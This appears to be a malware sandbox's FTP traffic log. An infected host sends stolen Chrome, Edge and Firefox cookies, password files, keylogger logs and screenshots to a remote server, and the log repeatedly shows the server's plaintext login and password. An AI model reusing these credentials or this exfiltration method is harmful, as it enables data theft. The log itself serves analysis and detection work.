                                            Nov 4, 2024 10:13:09.561956882 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:13:09.917282104 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,243,167)
                                            Nov 4, 2024 10:13:09.923052073 CET4970921192.168.2.5110.4.45.197STOR CO_Firefox_v6zchhhv.default-release.txt_user-960781_2024_11_04_13_00_19.txt
                                            Nov 4, 2024 10:13:10.881580114 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:13:11.250051975 CET2149709110.4.45.197192.168.2.5226 File successfully transferred
                                            Nov 4, 2024 10:13:17.191484928 CET2149716110.4.45.197192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 28 of 50 allowed.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 28 of 50 allowed.220-Local time is now 17:13. Server port: 21.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 28 of 50 allowed.220-Local time is now 17:13. Server port: 21.220-This is a private system - No anonymous login
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 28 of 50 allowed.220-Local time is now 17:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 28 of 50 allowed.220-Local time is now 17:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                            Nov 4, 2024 10:13:17.191725016 CET4971621192.168.2.5110.4.45.197USER origin@haliza.com.my
                                            Nov 4, 2024 10:13:17.551525116 CET2149716110.4.45.197192.168.2.5331 User origin@haliza.com.my OK. Password required
                                            Nov 4, 2024 10:13:17.551703930 CET4971621192.168.2.5110.4.45.197PASS JesusChrist007$
                                            Nov 4, 2024 10:13:17.936074018 CET2149716110.4.45.197192.168.2.5230 OK. Current restricted directory is /
                                            Nov 4, 2024 10:13:18.294068098 CET2149716110.4.45.197192.168.2.5504 Unknown command
                                            Nov 4, 2024 10:13:18.294240952 CET4971621192.168.2.5110.4.45.197PWD
                                            Nov 4, 2024 10:13:18.651875973 CET2149716110.4.45.197192.168.2.5257 "/" is your current location
                                            Nov 4, 2024 10:13:18.652288914 CET4971621192.168.2.5110.4.45.197TYPE I
                                            Nov 4, 2024 10:13:19.009896040 CET2149716110.4.45.197192.168.2.5200 TYPE is now 8-bit binary
                                            Nov 4, 2024 10:13:19.013953924 CET4971621192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:13:19.375341892 CET2149716110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,241,117)
                                            Nov 4, 2024 10:13:19.381402969 CET4971621192.168.2.5110.4.45.197STOR PW_user-960781_2024_11_04_04_13_15.html
                                            Nov 4, 2024 10:13:20.357707024 CET2149716110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:13:20.712255001 CET2149716110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.364 seconds (measured here), 0.94 Kbytes per second
                                            Nov 4, 2024 10:13:20.739705086 CET4971621192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:13:21.124290943 CET2149716110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,250,15)
                                            Nov 4, 2024 10:13:21.141900063 CET4971621192.168.2.5110.4.45.197STOR CO_Chrome_Default.txt_user-960781_2024_11_04_10_31_56.txt
                                            Nov 4, 2024 10:13:22.771806955 CET2149716110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:13:22.771951914 CET2149716110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:13:22.771981955 CET2149716110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:13:25.844021082 CET2149745110.4.45.197192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 28 of 50 allowed.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 28 of 50 allowed.220-Local time is now 17:13. Server port: 21.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 28 of 50 allowed.220-Local time is now 17:13. Server port: 21.220-This is a private system - No anonymous login
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 28 of 50 allowed.220-Local time is now 17:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 28 of 50 allowed.220-Local time is now 17:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                            Nov 4, 2024 10:13:25.844403028 CET4974521192.168.2.5110.4.45.197USER origin@haliza.com.my
                                            Nov 4, 2024 10:13:25.844455957 CET2149745110.4.45.197192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 28 of 50 allowed.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 28 of 50 allowed.220-Local time is now 17:13. Server port: 21.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 28 of 50 allowed.220-Local time is now 17:13. Server port: 21.220-This is a private system - No anonymous login
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 28 of 50 allowed.220-Local time is now 17:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 28 of 50 allowed.220-Local time is now 17:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                            Nov 4, 2024 10:13:26.184287071 CET2149745110.4.45.197192.168.2.5331 User origin@haliza.com.my OK. Password required
                                            Nov 4, 2024 10:13:26.185314894 CET4974521192.168.2.5110.4.45.197PASS JesusChrist007$
                                            Nov 4, 2024 10:13:26.556669950 CET2149745110.4.45.197192.168.2.5230 OK. Current restricted directory is /
                                            Nov 4, 2024 10:13:26.900331974 CET2149745110.4.45.197192.168.2.5504 Unknown command
                                            Nov 4, 2024 10:13:26.900731087 CET4974521192.168.2.5110.4.45.197PWD
                                            Nov 4, 2024 10:13:27.240027905 CET2149745110.4.45.197192.168.2.5257 "/" is your current location
                                            Nov 4, 2024 10:13:27.242155075 CET4974521192.168.2.5110.4.45.197TYPE I
                                            Nov 4, 2024 10:13:27.580374956 CET2149745110.4.45.197192.168.2.5200 TYPE is now 8-bit binary
                                            Nov 4, 2024 10:13:27.581007957 CET4974521192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:13:27.918997049 CET2149745110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,250,83)
                                            Nov 4, 2024 10:13:27.924803972 CET4974521192.168.2.5110.4.45.197STOR PW_user-960781_2024_11_04_04_13_24.html
                                            Nov 4, 2024 10:13:28.852077007 CET2149745110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:13:29.205054045 CET2149745110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.351 seconds (measured here), 0.97 Kbytes per second
                                            Nov 4, 2024 10:13:29.240055084 CET4974521192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:13:29.577224016 CET2149745110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,219,73)
                                            Nov 4, 2024 10:13:29.582776070 CET4974521192.168.2.5110.4.45.197STOR CO_Chrome_Default.txt_user-960781_2024_11_04_10_41_57.txt
                                            Nov 4, 2024 10:13:30.494503021 CET2149745110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:13:30.842742920 CET2149745110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.348 seconds (measured here), 0.81 Kbytes per second
                                            Nov 4, 2024 10:13:30.843142986 CET4974521192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:13:31.181891918 CET2149745110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,255,55)
                                            Nov 4, 2024 10:13:31.187427044 CET4974521192.168.2.5110.4.45.197STOR CO_Edge Chromium_Default.txt_user-960781_2024_11_04_12_50_48.txt
                                            Nov 4, 2024 10:13:32.126950026 CET2149745110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:13:32.476691008 CET2149745110.4.45.197192.168.2.5226 File successfully transferred
                                            Nov 4, 2024 10:13:32.477042913 CET4974521192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:13:32.816212893 CET2149745110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,226,198)
                                            Nov 4, 2024 10:13:32.821898937 CET4974521192.168.2.5110.4.45.197STOR CO_Firefox_v6zchhhv.default-release.txt_user-960781_2024_11_04_14_59_19.txt
                                            Nov 4, 2024 10:13:33.740529060 CET2149745110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:13:34.090506077 CET2149745110.4.45.197192.168.2.5226 File successfully transferred
                                            Nov 4, 2024 10:14:32.624996901 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:14:33.182800055 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,247,131)
                                            Nov 4, 2024 10:14:33.188241005 CET4970921192.168.2.5110.4.45.197STOR KL_user-960781_2024_11_17_21_53_38.html
                                            Nov 4, 2024 10:14:34.113265038 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:14:34.464957952 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.350 seconds (measured here), 0.80 Kbytes per second
                                            Nov 4, 2024 10:14:35.123785973 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:14:35.485382080 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,219,230)
                                            Nov 4, 2024 10:14:35.490983963 CET4970921192.168.2.5110.4.45.197STOR SC_user-960781_2024_11_21_00_44_12.jpeg
                                            Nov 4, 2024 10:14:36.384284019 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:14:37.137233019 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.753 seconds (measured here), 87.18 Kbytes per second
                                            Nov 4, 2024 10:14:42.815064907 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:14:43.174119949 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,193,220)
                                            Nov 4, 2024 10:14:43.179708958 CET4970921192.168.2.5110.4.45.197STOR SC_user-960781_2024_11_26_10_28_10.jpeg
                                            Nov 4, 2024 10:14:44.120671988 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:14:44.955656052 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.820 seconds (measured here), 78.62 Kbytes per second
                                            Nov 4, 2024 10:14:53.779392958 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:14:54.134797096 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,207,235)
                                            Nov 4, 2024 10:14:54.141563892 CET4970921192.168.2.5110.4.45.197STOR SC_user-960781_2024_12_03_03_34_51.jpeg
                                            Nov 4, 2024 10:14:55.062520981 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:14:55.841114998 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.779 seconds (measured here), 82.78 Kbytes per second
                                            Nov 4, 2024 10:14:57.506872892 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:14:57.868077993 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,201,56)
                                            Nov 4, 2024 10:14:57.882333040 CET4970921192.168.2.5110.4.45.197STOR SC_user-960781_2024_12_06_22_46_31.jpeg
                                            Nov 4, 2024 10:14:58.959717035 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:14:59.047811031 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:14:59.746118069 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.947 seconds (measured here), 68.04 Kbytes per second
                                            Nov 4, 2024 10:15:09.796015024 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:15:10.151797056 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,227,49)
                                            Nov 4, 2024 10:15:10.157993078 CET4970921192.168.2.5110.4.45.197STOR SC_user-960781_2024_12_14_10_46_01.jpeg
                                            Nov 4, 2024 10:15:11.089180946 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:15:11.887828112 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.801 seconds (measured here), 80.50 Kbytes per second
                                            Nov 4, 2024 10:15:11.957633018 CET2150004110.4.45.197192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 28 of 50 allowed.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 28 of 50 allowed.220-Local time is now 17:15. Server port: 21.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 28 of 50 allowed.220-Local time is now 17:15. Server port: 21.220-This is a private system - No anonymous login
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 28 of 50 allowed.220-Local time is now 17:15. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 28 of 50 allowed.220-Local time is now 17:15. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                            Nov 4, 2024 10:15:11.960347891 CET5000421192.168.2.5110.4.45.197USER origin@haliza.com.my
                                            Nov 4, 2024 10:15:13.237684011 CET2150004110.4.45.197192.168.2.5331 User origin@haliza.com.my OK. Password required
                                            Nov 4, 2024 10:15:13.237834930 CET5000421192.168.2.5110.4.45.197PASS JesusChrist007$
                                            Nov 4, 2024 10:15:13.237855911 CET2150004110.4.45.197192.168.2.5331 User origin@haliza.com.my OK. Password required
                                            Nov 4, 2024 10:15:13.238195896 CET2150004110.4.45.197192.168.2.5331 User origin@haliza.com.my OK. Password required
                                            Nov 4, 2024 10:15:13.238683939 CET2150004110.4.45.197192.168.2.5331 User origin@haliza.com.my OK. Password required
                                            Nov 4, 2024 10:15:13.596108913 CET2150004110.4.45.197192.168.2.5230 OK. Current restricted directory is /
                                            Nov 4, 2024 10:15:13.933480024 CET2150004110.4.45.197192.168.2.5504 Unknown command
                                            Nov 4, 2024 10:15:13.938083887 CET5000421192.168.2.5110.4.45.197PWD
                                            Nov 4, 2024 10:15:14.275235891 CET2150004110.4.45.197192.168.2.5257 "/" is your current location
                                            Nov 4, 2024 10:15:14.275672913 CET5000421192.168.2.5110.4.45.197TYPE I
                                            Nov 4, 2024 10:15:15.378047943 CET2150004110.4.45.197192.168.2.5200 TYPE is now 8-bit binary
                                            Nov 4, 2024 10:15:15.378062010 CET2150004110.4.45.197192.168.2.5200 TYPE is now 8-bit binary
                                            Nov 4, 2024 10:15:15.378156900 CET2150004110.4.45.197192.168.2.5200 TYPE is now 8-bit binary
                                            Nov 4, 2024 10:15:15.378372908 CET5000421192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:15:15.714868069 CET2150004110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,252,135)
                                            Nov 4, 2024 10:15:15.731566906 CET5000421192.168.2.5110.4.45.197STOR SC_user-960781_2024_11_27_19_12_39.jpeg
                                            Nov 4, 2024 10:15:16.665961027 CET2150004110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:15:17.490400076 CET2150004110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.824 seconds (measured here), 78.26 Kbytes per second
                                            Nov 4, 2024 10:15:19.968859911 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:15:20.324122906 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,228,129)
                                            Nov 4, 2024 10:15:20.334019899 CET4970921192.168.2.5110.4.45.197STOR SC_user-960781_2024_12_20_15_57_08.jpeg
                                            Nov 4, 2024 10:15:21.267529011 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:15:22.076407909 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.809 seconds (measured here), 79.67 Kbytes per second
                                            Nov 4, 2024 10:15:27.903599977 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:15:28.259224892 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,210,92)
                                            Nov 4, 2024 10:15:28.265204906 CET4970921192.168.2.5110.4.45.197STOR SC_user-960781_2024_12_27_15_05_20.jpeg
                                            Nov 4, 2024 10:15:29.161972046 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:15:30.841465950 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.756 seconds (measured here), 85.27 Kbytes per second
                                            Nov 4, 2024 10:15:30.841900110 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.756 seconds (measured here), 85.27 Kbytes per second
                                            Nov 4, 2024 10:15:30.842664003 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.756 seconds (measured here), 85.27 Kbytes per second
                                            Nov 4, 2024 10:15:34.296973944 CET5000421192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:15:34.644059896 CET2150004110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,212,106)
                                            Nov 4, 2024 10:15:34.654119968 CET5000421192.168.2.5110.4.45.197STOR SC_user-960781_2024_12_15_21_24_05.jpeg
                                            Nov 4, 2024 10:15:35.570746899 CET2150004110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:15:36.351334095 CET2150004110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.783 seconds (measured here), 82.35 Kbytes per second
                                            Nov 4, 2024 10:16:00.077168941 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:16:00.432797909 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,223,232)
                                            Nov 4, 2024 10:16:00.450118065 CET4970921192.168.2.5110.4.45.197STOR SC_user-960781_2025_01_12_15_26_53.jpeg
                                            Nov 4, 2024 10:16:01.360764027 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:16:02.145546913 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.774 seconds (measured here), 83.25 Kbytes per second
                                            Nov 4, 2024 10:16:03.409333944 CET5000421192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:16:03.745415926 CET2150004110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,242,121)
                                            Nov 4, 2024 10:16:03.760102987 CET5000421192.168.2.5110.4.45.197STOR SC_user-960781_2025_01_01_16_59_51.jpeg
                                            Nov 4, 2024 10:16:04.662096024 CET2150004110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:16:05.405729055 CET2150004110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.743 seconds (measured here), 86.80 Kbytes per second
                                            Nov 4, 2024 10:16:11.626420975 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:16:12.144942045 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,254,3)
                                            Nov 4, 2024 10:16:12.152189970 CET4970921192.168.2.5110.4.45.197STOR SC_user-960781_2025_01_19_18_31_18.jpeg
                                            Nov 4, 2024 10:16:13.058892012 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:16:13.835012913 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.777 seconds (measured here), 83.01 Kbytes per second
                                            Nov 4, 2024 10:16:15.858046055 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:16:16.213022947 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,207,164)
                                            Nov 4, 2024 10:16:16.230137110 CET4970921192.168.2.5110.4.45.197STOR SC_user-960781_2025_01_23_18_07_24.jpeg
                                            Nov 4, 2024 10:16:17.184423923 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:16:18.000878096 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.820 seconds (measured here), 78.60 Kbytes per second
                                            Nov 4, 2024 10:16:19.594584942 CET5000421192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:16:19.930874109 CET2150004110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,241,231)
                                            Nov 4, 2024 10:16:19.942167044 CET5000421192.168.2.5110.4.45.197STOR SC_user-960781_2025_01_10_20_38_28.jpeg
                                            Nov 4, 2024 10:16:20.848534107 CET2150004110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:16:21.615130901 CET2150004110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.767 seconds (measured here), 84.09 Kbytes per second
                                            Nov 4, 2024 10:16:22.842093945 CET2150016110.4.45.197192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 31 of 50 allowed.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 31 of 50 allowed.220-Local time is now 17:16. Server port: 21.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 31 of 50 allowed.220-Local time is now 17:16. Server port: 21.220-This is a private system - No anonymous login
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 31 of 50 allowed.220-Local time is now 17:16. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 31 of 50 allowed.220-Local time is now 17:16. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                            Nov 4, 2024 10:16:22.842247963 CET5001621192.168.2.5110.4.45.197USER origin@haliza.com.my
                                            Nov 4, 2024 10:16:23.191158056 CET2150016110.4.45.197192.168.2.5331 User origin@haliza.com.my OK. Password required
                                            Nov 4, 2024 10:16:23.191308975 CET5001621192.168.2.5110.4.45.197PASS JesusChrist007$
                                            Nov 4, 2024 10:16:23.561048031 CET2150016110.4.45.197192.168.2.5230 OK. Current restricted directory is /
                                            Nov 4, 2024 10:16:23.910518885 CET2150016110.4.45.197192.168.2.5504 Unknown command
                                            Nov 4, 2024 10:16:23.916021109 CET5001621192.168.2.5110.4.45.197PWD
                                            Nov 4, 2024 10:16:24.265996933 CET2150016110.4.45.197192.168.2.5257 "/" is your current location
                                            Nov 4, 2024 10:16:24.272486925 CET5001621192.168.2.5110.4.45.197TYPE I
                                            Nov 4, 2024 10:16:24.623590946 CET2150016110.4.45.197192.168.2.5200 TYPE is now 8-bit binary
                                            Nov 4, 2024 10:16:24.627492905 CET5001621192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:16:24.996318102 CET2150016110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,198,64)
                                            Nov 4, 2024 10:16:25.001816034 CET5001621192.168.2.5110.4.45.197STOR SC_user-960781_2025_01_28_14_34_54.jpeg
                                            Nov 4, 2024 10:16:25.781315088 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:16:25.904494047 CET2150016110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:16:26.136900902 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,229,157)
                                            Nov 4, 2024 10:16:26.142653942 CET4970921192.168.2.5110.4.45.197STOR SC_user-960781_2025_02_01_11_59_33.jpeg
                                            Nov 4, 2024 10:16:26.681606054 CET2150016110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.777 seconds (measured here), 82.97 Kbytes per second
                                            Nov 4, 2024 10:16:27.075494051 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:16:27.518811941 CET5001621192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:16:27.841684103 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.767 seconds (measured here), 84.07 Kbytes per second
                                            Nov 4, 2024 10:16:28.184540033 CET2150016110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,224,155)
                                            Nov 4, 2024 10:16:28.192312002 CET5001621192.168.2.5110.4.45.197STOR SC_user-960781_2025_02_04_10_36_53.jpeg
                                            Nov 4, 2024 10:16:29.119743109 CET2150016110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:16:29.259356022 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:16:29.614650965 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,234,99)
                                            Nov 4, 2024 10:16:29.620557070 CET4970921192.168.2.5110.4.45.197STOR SC_user-960781_2025_02_07_09_20_45.jpeg
                                            Nov 4, 2024 10:16:29.893259048 CET2150016110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.774 seconds (measured here), 83.32 Kbytes per second
                                            Nov 4, 2024 10:16:30.514843941 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:16:31.032507896 CET5000421192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:16:31.262309074 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.747 seconds (measured here), 86.27 Kbytes per second
                                            Nov 4, 2024 10:16:31.368158102 CET2150004110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,209,52)
                                            Nov 4, 2024 10:16:31.373780012 CET5000421192.168.2.5110.4.45.197STOR SC_user-960781_2025_01_18_02_28_20.jpeg
                                            Nov 4, 2024 10:16:32.277887106 CET2150004110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:16:33.051167011 CET2150004110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.774 seconds (measured here), 83.33 Kbytes per second
                                            Nov 4, 2024 10:16:39.517585993 CET5000421192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:16:39.854044914 CET2150004110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,205,111)
                                            Nov 4, 2024 10:16:39.875107050 CET5000421192.168.2.5110.4.45.197STOR SC_user-960781_2025_01_23_22_58_49.jpeg
                                            Nov 4, 2024 10:16:40.778814077 CET2150004110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:16:41.545667887 CET2150004110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.767 seconds (measured here), 90.24 Kbytes per second
                                            Nov 4, 2024 10:16:49.846080065 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:16:50.204061985 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,222,114)
                                            Nov 4, 2024 10:16:50.213270903 CET4970921192.168.2.5110.4.45.197STOR SC_user-960781_2025_02_18_12_47_44.jpeg
                                            Nov 4, 2024 10:16:51.127051115 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:16:51.906769037 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.783 seconds (measured here), 82.32 Kbytes per second
                                            Nov 4, 2024 10:16:58.451360941 CET2150024110.4.45.197192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 32 of 50 allowed.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 32 of 50 allowed.220-Local time is now 17:16. Server port: 21.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 32 of 50 allowed.220-Local time is now 17:16. Server port: 21.220-This is a private system - No anonymous login
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 32 of 50 allowed.220-Local time is now 17:16. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 32 of 50 allowed.220-Local time is now 17:16. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                            Nov 4, 2024 10:16:58.457046986 CET5002421192.168.2.5110.4.45.197USER origin@haliza.com.my
